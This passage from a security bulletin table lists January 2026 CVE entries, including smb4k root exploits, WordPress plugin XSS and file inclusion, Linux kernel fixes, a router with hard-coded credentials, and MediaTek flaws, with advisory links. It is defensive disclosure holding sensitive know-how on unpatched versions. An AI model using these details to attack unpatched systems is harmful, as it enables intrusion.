| https://github.com/KDE/--smb4k | An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability allows local users to perform arbitrary unmounts via the smb4k mount helper. | 2026-01-08 | not yet calculated | CVE-2025-66002 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66002 https://security.opensuse.org/2025/12/10/smb4k-major-issues-in-kauth-helper.html |
| https://github.com/KDE/--smb4k | An External Control of File Name or Path vulnerability in smb4k allows local users to perform a local root exploit via the smb4k mount helper if they can access and control the contents of a Samba share. This issue affects smb4k: from ? before 4.0.5. | 2026-01-08 | not yet calculated | CVE-2025-66003 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66003 https://security.opensuse.org/2025/12/10/smb4k-major-issues-in-kauth-helper.html |
| IAMB--Crypt::Sodium::XS | Crypt::Sodium::XS module versions prior to 0.000042, for Perl, include a vulnerable version of libsodium (libsodium <= 1.0.20, or a version of libsodium released before December 30, 2025) that contains the vulnerability documented as CVE-2025-69277 (https://www.cve.org/CVERecord?id=CVE-2025-69277). The libsodium vulnerability states: in atypical use cases involving certain custom cryptography or untrusted data passed to crypto_core_ed25519_is_valid_point, libsodium mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group. Version 0.000042 includes a version of libsodium updated to 1.0.20-stable, released January 3, 2026, which includes a fix for the vulnerability. | 2026-01-06 | not yet calculated | CVE-2025-15444 | https://github.com/jedisct1/libsodium/commit/ad3004ec8731730e93fcfbbc824e67eadc1c1bae https://00f.net/2025/12/30/libsodium-vulnerability/ https://metacpan.org/dist/Crypt-Sodium-XS/changes |
| jcaruso001--Flaming Password Reset | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jcaruso001 Flaming Password Reset flaming-password-reset allows Stored XSS. This issue affects Flaming Password Reset: from n/a through <= 1.0.3. | 2026-01-08 | not yet calculated | CVE-2025-68875 | https://vdp.patchstack.com/database/Wordpress/Plugin/flaming-password-reset/vulnerability/wordpress-flaming-password-reset-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jeroen Schmit--Theater for WordPress | Missing Authorization vulnerability in Jeroen Schmit Theater for WordPress theatre allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Theater for WordPress: from n/a through <= 0.19. | 2026-01-06 | not yet calculated | CVE-2025-69331 | https://vdp.patchstack.com/database/Wordpress/Plugin/theatre/vulnerability/wordpress-theater-for-wordpress-plugin-0-19-broken-access-control-vulnerability?_s_id=cve |
| Joomla! Project--Joomla! CMS | Lack of input filtering leads to an XSS vector in the HTML filter code related to data URLs in img tags. | 2026-01-06 | not yet calculated | CVE-2025-63082 | https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-content-filtering-for-data-urls.html |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to an XSS vector in the pagebreak plugin. | 2026-01-06 | not yet calculated | CVE-2025-63083 | https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html |
| jvoisin--snuffleupagus | Snuffleupagus is a module that raises the cost of attacks against websites by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0. | 2026-01-08 | not yet calculated | CVE-2026-22034 | https://github.com/jvoisin/snuffleupagus/security/advisories/GHSA-c4ch-xw5p-2mvc https://github.com/jvoisin/snuffleupagus/commit/9278dc77bab2a219e770a1b31dd6797bc9070e37 https://github.com/jvoisin/snuffleupagus/blob/9278dc77bab2a219e770a1b31dd6797bc9070e37/src/sp_upload_validation.c#L92-L100 https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.php https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.py https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/ext/standard/dl.c#L165-L166 https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/main/rfc1867.c#L1269-L1274 https://snuffleupagus.readthedocs.io/config.html#upload-validation |
| jwsthemes--OchaHouse | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jwsthemes OchaHouse ochahouse allows PHP Local File Inclusion. This issue affects OchaHouse: from n/a through <= 2.2.8. | 2026-01-08 | not yet calculated | CVE-2025-12550 | https://vdp.patchstack.com/database/Wordpress/Theme/ochahouse/vulnerability/wordpress-ochahouse-theme-2-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| Kaira--Blockons | Missing Authorization vulnerability in Kaira Blockons blockons allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Blockons: from n/a through <= 1.2.15. | 2026-01-08 | not yet calculated | CVE-2025-14360 | https://vdp.patchstack.com/database/Wordpress/Plugin/blockons/vulnerability/wordpress-blockons-plugin-1-2-15-broken-access-control-vulnerability?_s_id=cve |
| KAON--CG3000T | The firmware in KAON CG3000TC and CG3000T routers contains hard-coded credentials in clear text (shared across all routers of this model) that an unauthenticated remote attacker could use to execute commands with root privileges. This vulnerability has been fixed in firmware version: 1.00.67 for CG3000TC and 1.00.27 for CG3000T. | 2026-01-09 | not yet calculated | CVE-2025-7072 | https://cert.pl/posts/2026/01/CVE-2025-7072/ |
| Kentico--Kentico Xperience | Kentico Xperience 13 is vulnerable to a stored cross-site scripting attack via a form component, allowing an attacker to hijack a victim user's session and perform actions in their security context. | 2026-01-05 | not yet calculated | CVE-2025-5591 | https://www.themissinglink.com.au/security-advisories/cve-2025-5591 |
| Kieback&Peter--Neutrino-GLT | The Kieback&Peter Neutrino-GLT product is used for building management. Its web component "SM70 PHWEB" is vulnerable to shell command injection via the login form. The injected commands would execute with low privileges. The vulnerability has been fixed in version 9.40.02. | 2026-01-07 | not yet calculated | CVE-2025-6225 | https://cert.pl/en/posts/2026/01/CVE-2025-6225/ |
| KnowageLabs--Knowage-Server | Knowage is an open source analytics and business intelligence suite. Prior to version 8.1.37, there is a blind server-side request forgery vulnerability. The vulnerability allows attackers to send requests to arbitrary hosts/paths. Since the attacker is not able to read the response, the impact of this vulnerability is limited. However, an attacker should be able to leverage this vulnerability to scan the internal network. This issue has been patched in version 8.1.37. | 2026-01-07 | not yet calculated | CVE-2025-58441 | https://github.com/KnowageLabs/Knowage-Server/security/advisories/GHSA-m6x8-wh9v-6jxp |
| LambertGroup--CountDown With Image or Video Background | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup CountDown With Image or Video Background countdown-with-background allows Reflected XSS. This issue affects CountDown With Image or Video Background: from n/a through <= 1.5. | 2026-01-08 | not yet calculated | CVE-2025-27002 | https://vdp.patchstack.com/database/Wordpress/Plugin/countdown-with-background/vulnerability/wordpress-countdown-with-image-or-video-background-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Famous - Responsive Image And Video Grid Gallery WordPress Plugin | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Famous - Responsive Image And Video Grid Gallery WordPress Plugin famous_grid_image_and_video_gallery allows Reflected XSS. This issue affects Famous - Responsive Image And Video Grid Gallery WordPress Plugin: from n/a through <= 1.4. | 2026-01-08 | not yet calculated | CVE-2025-27004 | https://vdp.patchstack.com/database/Wordpress/Plugin/famous_grid_image_and_video_gallery/vulnerability/wordpress-famous-responsive-image-and-video-grid-gallery-wordpress-plugin-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| langgenius--dify | Dify is an open-source LLM app development platform. Prior to version 1.11.0, the API key is exposed in plaintext to the frontend, allowing non-administrator users to view and reuse it. This can lead to unauthorized access to third-party services, potentially consuming limited quotas. Version 1.11.0 fixes the issue. | 2026-01-05 | not yet calculated | CVE-2025-67732 | https://github.com/langgenius/dify/security/advisories/GHSA-phpv-94hg-fv9g |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/fpu: Fix false-positive kmsan report in fpu_vstl() A false-positive kmsan report is detected when running the ping command. The inline assembly instruction 'vstl' can write a varying number of bytes depending on the value of the 'index' argument. If 'index' > 0, 'vstl' writes at least 2 bytes. clang generates the kmsan write helper call depending on the inline assembly constraints. Constraints are evaluated at compile time, but the value of the 'index' argument is known only at runtime. clang currently generates a call to __msan_instrument_asm_store with 1 byte as the size. Manually call the kmsan function to indicate the correct number of bytes written and fix the false-positive report. This change fixes the resulting kmsan reports. | 2026-01-05 | not yet calculated | CVE-2025-68751 | https://git.kernel.org/stable/c/946357a538bb47740635c25520924351d2d91544 https://git.kernel.org/stable/c/13dcd6308cb8f67134ee5d5d762b2a66363c695b https://git.kernel.org/stable/c/14e4e4175b64dd9216b522f6ece8af6997d063b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: Implement settime64 with -EOPNOTSUPP ptp_clock_settime() assumes every ptp_clock has implemented settime64(). Stub it with -EOPNOTSUPP to prevent a NULL dereference. The fix is similar to commit 329d050bbe63 ("gve: Implement settime64 with -EOPNOTSUPP"). | 2026-01-05 | not yet calculated | CVE-2025-68752 | https://git.kernel.org/stable/c/9e3dbc3bb2e2aa728b49422b2e5344488f93f690 https://git.kernel.org/stable/c/6d080f810ffd6b8e002ce5bee8b9c551ca2535c2 https://git.kernel.org/stable/c/1e43ebcd5152b3e681a334cc6542fb21770c3a2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: firewire-motu: add bounds check in put_user loop for DSP events In the DSP event handling code, a put_user() loop copies event data. When the user buffer size is not aligned to 4 bytes, it could overwrite beyond the buffer boundary. Fix by adding a bounds check before put_user(). | 2026-01-05 | not yet calculated | CVE-2025-68753 | https://git.kernel.org/stable/c/ea2c921d9de6e32ca50cb817b9d57bb881be70de https://git.kernel.org/stable/c/6d4f17782ce4facf3197e79707df411ee3d7b30a https://git.kernel.org/stable/c/0d71b3c2ed742f1ccb3b0b7a61afb90c0251093f https://git.kernel.org/stable/c/df692cf2b601a54b34edfdb9e683d67483aa8ce1 https://git.kernel.org/stable/c/8f9e51cf2a2a43d0cd72d3dc0b5ccea3f639c187 https://git.kernel.org/stable/c/298e753880b6ea99ac30df34959a7a03b0878eed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rtc: amlogic-a4: fix double free caused by devm The clock obtained via devm_clk_get_enabled() is automatically managed by devres and will be disabled and freed on driver detach. Manually calling clk_disable_unprepare() in the error path and the remove function causes a double free. Remove the redundant clk_disable_unprepare() calls from the probe error path and aml_rtc_remove(), allowing the devm framework to manage the clock lifecycle automatically. | 2026-01-05 | not yet calculated | CVE-2025-68754 | https://git.kernel.org/stable/c/9fed02c16488050cd4e33e045506336b216d7301 https://git.kernel.org/stable/c/2e1c79299036614ac32b251d145fad5391f4bcab https://git.kernel.org/stable/c/384150d7a5b60c1086790a8ee07b0629f906cca2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: most: remove broken i2c driver The MOST I2C driver has been completely broken for five years without anyone noticing, so remove the driver from staging. Specifically, commit 723de0f9171e ("staging: most: remove device from interface structure") started requiring drivers to set the interface device pointer before registration, but the I2C driver was never updated, which results in a NULL pointer dereference if anyone ever tries to probe it. | 2026-01-05 | not yet calculated | CVE-2025-68755 | https://git.kernel.org/stable/c/6cbba922934805f86eece6ba7010b7201962695d https://git.kernel.org/stable/c/6059a66dba7f26b21852831432e17075f1a1c783 https://git.kernel.org/stable/c/e463548fd80e779efea1cb2d3049b8a7231e6925 https://git.kernel.org/stable/c/495df2da6944477d282d5cc0c13174d06e25b310 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: Use RCU in blk_mq_[un]quiesce_tagset() instead of set->tag_list_lock The blk_mq_{add,del}_queue_tag_set() functions add and remove queues from a tagset; they make sure that the tagset and queues are marked as shared when two or more queues are attached to the same tagset. Initially a tagset starts as unshared, and when the number of added queues reaches two, blk_mq_add_queue_tag_set() marks it as shared along with all the queues attached to it. When the number of attached queues drops to 1, blk_mq_del_queue_tag_set() needs to mark both the tagset and the remaining queues as unshared. Both functions need to freeze the current queues in the tagset before setting or unsetting the BLK_MQ_F_TAG_QUEUE_SHARED flag. While doing so, both functions hold the set->tag_list_lock mutex, which makes sense as we do not want queues to be added or deleted in the process. This used to work fine until commit 98d81f0df70c ("nvme: use blk_mq_[un]quiesce_tagset") made the nvme driver quiesce the tagset instead of quiescing individual queues. blk_mq_quiesce_tagset() does the job and quiesces the queues in set->tag_list while also holding set->tag_list_lock. This results in a deadlock between two threads with these stacktraces: __schedule+0x47c/0xbb0 ? timerqueue_add+0x66/0xb0 schedule+0x1c/0xa0 schedule_preempt_disabled+0xa/0x10 __mutex_lock.constprop.0+0x271/0x600 blk_mq_quiesce_tagset+0x25/0xc0 nvme_dev_disable+0x9c/0x250 nvme_timeout+0x1fc/0x520 blk_mq_handle_expired+0x5c/0x90 bt_iter+0x7e/0x90 blk_mq_queue_tag_busy_iter+0x27e/0x550 ? __blk_mq_complete_request_remote+0x10/0x10 ? __blk_mq_complete_request_remote+0x10/0x10 ? __call_rcu_common.constprop.0+0x1c0/0x210 blk_mq_timeout_work+0x12d/0x170 process_one_work+0x12e/0x2d0 worker_thread+0x288/0x3a0 ? rescuer_thread+0x480/0x480 kthread+0xb8/0xe0 ? kthread_park+0x80/0x80 ret_from_fork+0x2d/0x50 ? kthread_park+0x80/0x80 ret_from_fork_asm+0x11/0x20 __schedule+0x47c/0xbb0 ? xas_find+0x161/0x1a0 schedule+0x1c/0xa0 blk_mq_freeze_queue_wait+0x3d/0x70 ? destroy_sched_domains_rcu+0x30/0x30 blk_mq_update_tag_set_shared+0x44/0x80 blk_mq_exit_queue+0x141/0x150 del_gendisk+0x25a/0x2d0 nvme_ns_remove+0xc9/0x170 nvme_remove_namespaces+0xc7/0x100 nvme_remove+0x62/0x150 pci_device_remove+0x23/0x60 device_release_driver_internal+0x159/0x200 unbind_store+0x99/0xa0 kernfs_fop_write_iter+0x112/0x1e0 vfs_write+0x2b1/0x3d0 ksys_write+0x4e/0xb0 do_syscall_64+0x5b/0x160 entry_SYSCALL_64_after_hwframe+0x4b/0x53 The top stacktrace shows nvme_timeout() called to handle an nvme command timeout. The timeout handler is trying to disable the controller and, as a first step, it needs to call blk_mq_quiesce_tagset() to tell blk-mq not to call queue callback handlers. The thread is stuck waiting for set->tag_list_lock as it tries to walk the queues in set->tag_list. The lock is held by the second thread in the bottom stack, which is waiting for one of the queues to be frozen. The queue usage counter would drop to zero after nvme_timeout() finishes, but this will not happen because that thread will wait for the mutex forever. Given that [un]quiescing a queue is an operation that does not need to sleep, update blk_mq_[un]quiesce_tagset() to use RCU instead of taking set->tag_list_lock, and update blk_mq_{add,del}_queue_tag_set() to use RCU-safe list operations. Also, delete INIT_LIST_HEAD(&q->tag_set_list) in blk_mq_del_queue_tag_set() because we cannot re-initialize it while the list is being traversed under RCU. The deleted queue will not be added to or deleted from a tagset, and it will be freed in blk_free_queue() after the end of the RCU grace period. | 2026-01-05 | not yet calculated | CVE-2025-68756 | https://git.kernel.org/stable/c/ca8764c0ea1fb825f17f19704af55e9e02c9f768 https://git.kernel.org/stable/c/3baeec23a82e7ee9691f434c6ab0ab1387326108 https://git.kernel.org/stable/c/6e8d363786765a81e35083e0909e076796468edf https://git.kernel.org/stable/c/ef0cd7b694928573f6569e61c14f5f059253162e https://git.kernel.org/stable/c/59e25ef2b413c72da6686d431e7759302cfccafa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vgem-fence: Fix potential deadlock on release A timer that expires a vgem fence automatically in 10 seconds is now released with timer_delete_sync() from fence->ops.release(), called on the last dma_fence_put(). In some scenarios, it can run in IRQ context, which is not safe unless TIMER_IRQSAFE is used. One potentially risky scenario was demonstrated in Intel DRM CI trybot, BAT run on machine bat-adlp-6, while working on new IGT subtests syncobj_timeline@stress-* as user space replacements of some problematic test cases of a dma-fence-chain selftest [1]. | 2026-01-05 | not yet calculated | CVE-2025-68757 | https://git.kernel.org/stable/c/1026d1b0bd55e1be7ba0f9e9b1c9f6e02448f25a https://git.kernel.org/stable/c/9dc3c78d21e16f5af1a9c3d11b4bd5276f891fe0 https://git.kernel.org/stable/c/338e388c0d80ffc04963b6b0ec702ffdfd2c4eba https://git.kernel.org/stable/c/4f335cb8fad69b2be5accf0ebac3a8b345915f4e https://git.kernel.org/stable/c/1f0ca9d3e7c38a39f1f12377c24decf0bba46e54 https://git.kernel.org/stable/c/78b4d6463e9e69e5103f98b367f8984ad12cdc6f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: backlight: led-bl: Add devlink to supplier LEDs LED Backlight is a consumer of one or multiple LED class devices, but devlink is currently unable to create correct supplier-producer links when the supplier is a class device. It creates instead a link where the supplier is the parent of the expected device. One consequence is that removal order is not correctly enforced. Issues happen for example with the following sections in a device tree overlay: // An LED driver chip pca9632@62 { compatible = "nxp,pca9632"; reg = <0x62>; // ... addon_led_pwm: led-pwm@3 { reg = <3>; label = "addon:led:pwm"; }; }; backlight-addon { compatible = "led-backlight"; leds = <&addon_led_pwm>; brightness-levels = <255>; default-brightness-level = <255>; }; In this example, the devlink should be created between the backlight-addon (consumer) and the pca9632@62 (supplier). Instead it is created between the backlight-addon (consumer) and the parent of the pca9632@62, which is typically the I2C bus adapter. On removal of the above overlay, the LED driver can be removed before the backlight device, resulting in: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010 ... Call trace: led_put+0xe0/0x140 devm_led_release+0x6c/0x98 Another way to reproduce the bug without any device tree overlays is unbinding the LED class device (pca9632@62) before unbinding the consumer (backlight-addon): echo 11-0062 >/sys/bus/i2c/drivers/leds-pca963x/unbind echo ...backlight-dock >/sys/bus/platform/drivers/led-backlight/unbind Fix by adding a devlink between the consuming led-backlight device and the supplying LED device, as other drivers and subsystems do as well. | 2026-01-05 | not yet calculated | CVE-2025-68758 | https://git.kernel.org/stable/c/e06df738a9ad8417f1c4c7cd6992cda320e9e7ca https://git.kernel.org/stable/c/30cbe4b642745a9488a0f0d78be43afe69d7555c https://git.kernel.org/stable/c/0e63ea4378489e09eb5e920c8a50c10caacf563a https://git.kernel.org/stable/c/60a24070392ec726ccfe6ad1ca7b0381c8d8f7c9 https://git.kernel.org/stable/c/08c9dc6b0f2c68e5e7c374ac4499e321e435d46c https://git.kernel.org/stable/c/9341d6698f4cfdfc374fb6944158d111ebe16a9d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtl818x: Fix potential memory leaks in rtl8180_init_rx_ring() In rtl8180_init_rx_ring(), memory is allocated for skb packets and DMA allocations in a loop. When an allocation fails, the previously successful allocations are not freed on exit. Fix that by jumping to err_free_rings label on error, which calls rtl8180_free_rx_ring() to free the allocations. Remove the free of rx_ring in rtl8180_init_rx_ring() error path, and set the freed priv->rx_buf entry to null, to avoid double free. | 2026-01-05 | not yet calculated | CVE-2025-68759 | https://git.kernel.org/stable/c/a4fb7cca9837378878e6c94d9e7af019c8fdfcdb https://git.kernel.org/stable/c/bf8513dfa31ea015c9cf415796dca2113d293840 https://git.kernel.org/stable/c/ee7db11742b30641f21306105ad27a275e3c61d7 https://git.kernel.org/stable/c/a813a74570212cb5f3a7d3b05c0cb0cd00bace1d https://git.kernel.org/stable/c/c9d1c4152e6d32fa74034464854bee262a60bc43 https://git.kernel.org/stable/c/9b5b9c042b30befc5b37e4539ace95af70843473 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Fix potential out-of-bounds read in iommu_mmio_show In iommu_mmio_write(), it validates the user-provided offset with the check: `iommu->dbg_mmio_offset > iommu->mmio_phys_end - 4`. This assumes a 4-byte access. However, the corresponding show handler, iommu_mmio_show(), uses readq() to perform an 8-byte (64-bit) read. If a user provides an offset equal to `mmio_phys_end - 4`, the check passes, and will lead to a 4-byte out-of-bounds read. Fix this by adjusting the boundary check to use sizeof(u64), which corresponds to the size of the readq() operation. | 2026-01-05 | not yet calculated | CVE-2025-68760 | https://git.kernel.org/stable/c/b959df804c33913dbfdb90750f2d693502b3d126 https://git.kernel.org/stable/c/0ec4aaf5f3f559716a6559f3d6d9616e9470bed6 https://git.kernel.org/stable/c/a0c7005333f9a968abb058b1d77bbcd7fb7fd1e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: fix potential use after free in hfs_correct_next_unused_CNID() This code calls hfs_bnode_put(node), which drops the refcount, and then dereferences "node" on the next line. It's only safe to use "node" while we're holding a reference, so flip these two lines around. | 2026-01-05 | not yet calculated | CVE-2025-68761 | https://git.kernel.org/stable/c/40a1e0142096dd7dd6cb5373841222b528698588 https://git.kernel.org/stable/c/c105e76bb17cf4b55fe89c6ad4f6a0e3972b5b08 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: netpoll: initialize work queue before error checks Prevent a kernel warning when netconsole setup fails on devices with IFF_DISABLE_NETPOLL flag. The warning (at kernel/workqueue.c:4242 in __flush_work) occurs because the cleanup path tries to cancel an uninitialized work queue. When __netpoll_setup() encounters a device with IFF_DISABLE_NETPOLL, it fails early and calls skb_pool_flush() for cleanup. This function calls cancel_work_sync(&np->refill_wq), but refill_wq hasn't been initialized yet, triggering the warning. Move INIT_WORK() to the beginning of __netpoll_setup(), ensuring the work queue is properly initialized before any potential failure points. This allows the cleanup path to safely cancel the work queue regardless of where the setup fails. | 2026-01-05 | not yet calculated | CVE-2025-68762 | https://git.kernel.org/stable/c/a90d0dc38a10347078cca60e7495ad0648838f18 https://git.kernel.org/stable/c/760bc6ceda8e2c273c0e2018ad2595967c3dd308 https://git.kernel.org/stable/c/e5235eb6cfe02a51256013a78f7b28779a7740d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: starfive - Correctly handle return of sg_nents_for_len The return value of sg_nents_for_len was assigned to an unsigned long in starfive_hash_digest, causing negative error codes to be converted to large positive integers. Add error checking for sg_nents_for_len and return immediately on failure to prevent potential buffer overflows. | 2026-01-05 | not yet calculated | CVE-2025-68763 | https://git.kernel.org/stable/c/6cd14414394b4f3d6e1ed64b8241d1fcc2271820 https://git.kernel.org/stable/c/0c3854d65cc4402cb8c52d4d773450a06efecab6 https://git.kernel.org/stable/c/1af5c973dd744e29fa22121f43e8646b7a7a71a7 https://git.kernel.org/stable/c/9b3f71cf02e04cfaa482155e3078707fe7f8aef4 https://git.kernel.org/stable/c/e9eb52037a529fbb307c290e9951a62dd728b03d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags When a filesystem is being automounted, it needs to preserve the user-set superblock mount options, such as the "ro" flag. | 2026-01-05 | not yet calculated | CVE-2025-68764 | https://git.kernel.org/stable/c/c09070b4def1b34e473a746c6a5331ccb80902c1 https://git.kernel.org/stable/c/dce10c59211e5cd763a62ea01e79b82a629811e3 https://git.kernel.org/stable/c/612cc98698d667df804792f0c47d4e501e66da29 https://git.kernel.org/stable/c/4b296944e632cf4c6a4cc8e2585c6451eae47b1b https://git.kernel.org/stable/c/df9b003a2ecacc7218486fbb31fe008c93097d5f https://git.kernel.org/stable/c/8675c69816e4276b979ff475ee5fac4688f80125 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mt76: mt7615: Fix memory leak in mt7615_mcu_wtbl_sta_add() In mt7615_mcu_wtbl_sta_add(), an skb sskb is allocated. If the subsequent call to mt76_connac_mcu_alloc_wtbl_req() fails, the function returns an error without freeing sskb, leading to a memory leak. Fix this by calling dev_kfree_skb() on sskb in the error handling path to ensure it is properly released. | 2026-01-05 | not yet calculated | CVE-2025-68765 | https://git.kernel.org/stable/c/594ff8bb69e239678a8baa461827ce4bb90eff8f https://git.kernel.org/stable/c/1c3c234af9407256ed670c8752923a672eea4225 https://git.kernel.org/stable/c/278bfed4529a0c9c9119f5a52ddafe69db61a75c https://git.kernel.org/stable/c/fb905e69941b44e03fe1a24e95328d45442b6d6d https://git.kernel.org/stable/c/4d42aba0ee49c0aa015c50c4f2a07cf8fa1c3a49 https://git.kernel.org/stable/c/53d1548612670aa8b5d89745116cc33d9d172863 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: irqchip/mchp-eic: Fix error code in mchp_eic_domain_alloc() If irq_domain_translate_twocell() sets "hwirq" to >= MCHP_EIC_NIRQ (2) then it results in an out of bounds access. The code checks for invalid values, but doesn't set the error code. Return -EINVAL in that case, instead of returning success. | 2026-01-05 | not yet calculated | CVE-2025-68766 | https://git.kernel.org/stable/c/324c60a67c4b9668497940f667db14d216cc7b1b https://git.kernel.org/stable/c/c21c606ad398eeb86a0f3aaff9ba4f2665e286c6 https://git.kernel.org/stable/c/3873afcb57614c1aaa5b6715554d6d1c22cac95a https://git.kernel.org/stable/c/09efe7cfbf919c4d763bc425473fcfee0dc98356 https://git.kernel.org/stable/c/efd65e2e2fd96f7aaa5cb07d79bbbfcfc80aa552 https://git.kernel.org/stable/c/7dbc0d40d8347bd9de55c904f59ea44bcc8dedb7 |
| loopus--WP Attractive Donations System - Easy Stripe & Paypal donations | Missing Authorization vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25. | 2026-01-08 | not yet calculated | CVE-2025-22715 | https://vdp.patchstack.com/database/Wordpress/Plugin/WP_AttractiveDonationsSystem/vulnerability/wordpress-wp-attractive-donations-system-easy-stripe-paypal-donations-plugin-1-25-arbitrary-content-deletion-vulnerability?_s_id=cve |
| loopus--WP Virtual Assistant | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in loopus WP Virtual Assistant VirtualAssistant allows Stored XSS. This issue affects WP Virtual Assistant: from n/a through <= 3.0. | 2026-01-08 | not yet calculated | CVE-2025-22725 | https://vdp.patchstack.com/database/Wordpress/Plugin/VirtualAssistant/vulnerability/wordpress-wp-virtual-assistant-plugin-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| magentech--Rozy - Flower Shop | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magentech Rozy - Flower Shop rozy allows PHP Local File Inclusion. This issue affects Rozy - Flower Shop: from n/a through <= 1.2.25. | 2026-01-08 | not yet calculated | CVE-2025-12549 | https://vdp.patchstack.com/database/Wordpress/Theme/rozy/vulnerability/wordpress-rozy-flower-shop-theme-1-2-25-local-file-inclusion-vulnerability?_s_id=cve |
| magepeopleteam--Car Rental Manager | Missing Authorization vulnerability in magepeopleteam Car Rental Manager car-rental-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Car Rental Manager: from n/a through <= 1.0.9. | 2026-01-06 | not yet calculated | CVE-2025-69327 | https://vdp.patchstack.com/database/Wordpress/Plugin/car-rental-manager/vulnerability/wordpress-car-rental-manager-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. By nature, Mastodon performs a lot of outbound requests to user-provided domains. Mastodon, however, has some protection mechanism to disallow requests to local IP addresses (unless specified in `ALLOWED_PRIVATE_ADDRESSES`) to avoid the "confused deputy" problem. The list of disallowed IP address ranges was lacking some IP address ranges that can be used to reach local IP addresses. An attacker can use an IP address in the affected ranges to make Mastodon perform HTTP requests against loopback or local network hosts, potentially allowing access to otherwise private resources and services. This is fixed in Mastodon v4.5.4, v4.4.11, v4.3.17 and v4.2.29. | 2026-01-08 | not yet calculated | CVE-2026-22245 | https://github.com/mastodon/mastodon/security/advisories/GHSA-xfrj-c749-jxxq https://github.com/mastodon/mastodon/commit/0f4e8a6240b5af1f2c3f34d2793d8610c6ef2aca https://github.com/mastodon/mastodon/commit/17022907866710a72a1b1fc0a5ce9538bad1b4c3 https://github.com/mastodon/mastodon/commit/71ae4cf2cf5138ccdda64b1b1d665849b688686d |
| MediaTek, Inc.--MT2718, MT6580, MT6739, MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6855, MT6873, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8186, MT8188, MT8195, MT8196, MT8370, MT8390, MT8391, MT8395, MT8676, MT8678, MT8696, MT8755, MT8766, MT8768, MT8781, MT8786, MT8788E, MT8791T, MT8792, MT8793, MT8796, MT8873, MT8883, MT8893 | In KeyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10276761; Issue ID: MSV-5141. | 2026-01-06 | not yet calculated | CVE-2025-20795 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
| MediaTek, Inc.--MT2718, MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6897, MT6899, MT6983, MT6985, MT6989, MT6991, MT8196, MT8676, MT8678, MT8796 | In display, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10149879; Issue ID: MSV-4658. | 2026-01-06 | not yet calculated | CVE-2025-20787 | https://corp.mediatek.com/product-security-bulletin/January-2026 |
